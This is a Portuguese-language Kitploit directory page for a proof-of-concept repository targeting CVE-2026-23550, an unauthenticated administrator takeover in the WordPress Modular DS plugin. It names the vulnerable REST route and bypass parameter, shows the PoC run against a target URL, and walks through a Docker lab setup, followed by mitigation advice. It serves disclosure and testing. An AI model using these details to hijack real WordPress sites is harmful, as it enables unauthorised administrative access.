Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-23550-PoC — CVE-2026-23550 - Plugin WordPress Modular DS **Acesso de Administrador Não Autenticado** | Kitploit
Ferramentas/GitHubGitHub/thetorjancaptain/cve-2026-23550-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticação
GitHubthetorjancaptain/cve-2026-23550-poc

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin WordPress Modular DS **Acesso de Administrador Não Autenticado**

Ver Repositório
1há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-23550-PoC

CVE-2026-23550 - Plugin WordPress Modular DS Acesso de Administrador Não Autenticado

Status CVSS Affected

Prova de Conceito (PoC) demonstrando a CVE-2026-23550 - tomada de conta de administrador crítica e não autenticada no plugin WordPress Modular DS (versões ≤2.5.1). Explorada ativamente em produção.

Fluxo do PoC

Resumo do Ataque: Roteamento de API REST falho em /api/modular-connector/login contorna a autenticação do WordPress quando , concedendo cookies de sessão de administrador não autenticados.

origin=mo

🚀 Demonstração Rápida - Se você já tem WP configurado

root@kitploit:~
# PoC pronto para produção
./CVE-2026-23550-PoC.sh http://target.com

Saída:

root@kitploit:~
[+] CVE-2026-23550 Teste de Exploração do Modular Connector
[+] VULNERÁVEL: Cookie de sessão de administrador emitido

Nota Técnica:

O endpoint REST afetado é acessível exclusivamente através do mecanismo ?rest_route=; o acesso direto via /wp-json/ pode não estar disponível. A vulnerabilidade permite acesso não autenticado sem credenciais ou validação de nonce. A emissão bem-sucedida de um cookie de sessão de administrador do WordPress constitui confirmação da exploração. Esta prova de conceito não executa nenhuma ação administrativa. A versão 2.5.0 do Modular DS é usada durante os testes.


⚙️ Passos para Reproduzir:

Passo 1: Diretório do laboratório

root@kitploit:~
mkdir -p ~/Desktop/CVE-2026-23550/cve-poc-wp
cd ~/Desktop/CVE-2026-23550/cve-poc-wp

Passo 2: Docker Compose

root@kitploit:~
version: "3.9"

services:
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: rootpass
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wpuser
      MYSQL_PASSWORD: wppass
    volumes:
      - db_data:/var/lib/mysql

  wordpress:
    image: wordpress:6.4.3-php8.2-apache
    depends_on:
      - db
    ports:
      - "8080:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wpuser
      WORDPRESS_DB_PASSWORD: wppass
      WORDPRESS_DB_NAME: wordpress
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

Passo 3: Implantação

root@kitploit:~
docker compose up -d
docker compose logs -f db

Aguarde por: "ready for connections"

Passo 4: Instalação do WordPress

  • URL: http://localhost:8080
  • Usuário admin: admin
  • Senha: admin123
  • Título do site: qualquer coisa

Passo 5: Verificar REST (IMPORTANTE)

root@kitploit:~
curl http://localhost:8080/?rest_route=/

Esperado:

root@kitploit:~
{
  "name": "...",
  "namespaces": [...]
}

Se isso falhar → PARE, o ambiente está quebrado.

Passo 6: Instalar plugin vulnerável

root@kitploit:~
wget https://downloads.wordpress.org/plugin/modular-connector.2.5.0.zip
unzip modular-connector.2.5.0.zip

WORDPRESS_ID=$(docker compose ps -q wordpress)
docker cp modular-connector "$WORDPRESS_ID":/var/www/html/wp-content/plugins/

docker exec "$WORDPRESS_ID" chown -R www-data:www-data \
  /var/www/html/wp-content/plugins/modular-connector

Passo 7: Ativar plugin

  • http://localhost:8080/wp-admin/plugins.php
  • Ativar Modular Connector
  • Ignorar prompts de integração

Passo 8: Exploração

root@kitploit:~
chmod +x CVE-2026-23550-PoC.sh
./CVE-2026-23550-PoC.sh http://localhost:8080/

Nota: Se você quiser cookies em um arquivo de texto, remova "rm -f "$COOKIE_JAR"" do arquivo poc.sh.

🛡️ Mitigação

  • Imediata: Desativar o plugin Modular DS
  • Correção: Atualizar para 2.5.2+
  • Auditoria: Verificar usuários administradores não autorizados
  • WAF: Bloquear ?rest_route=/api/modular-connector/login

📄 Licença

Licença MIT - Apenas para pesquisa de segurança e testes de penetração autorizados. Não para uso malicioso. Divulgue de forma responsável.

🚨 Aviso Legal

Este PoC é apenas para testes de segurança autorizados. O uso não autorizado contra sistemas de produção é ilegal. Reporte descobertas aos mantenedores do plugin.

Baixar ferramenta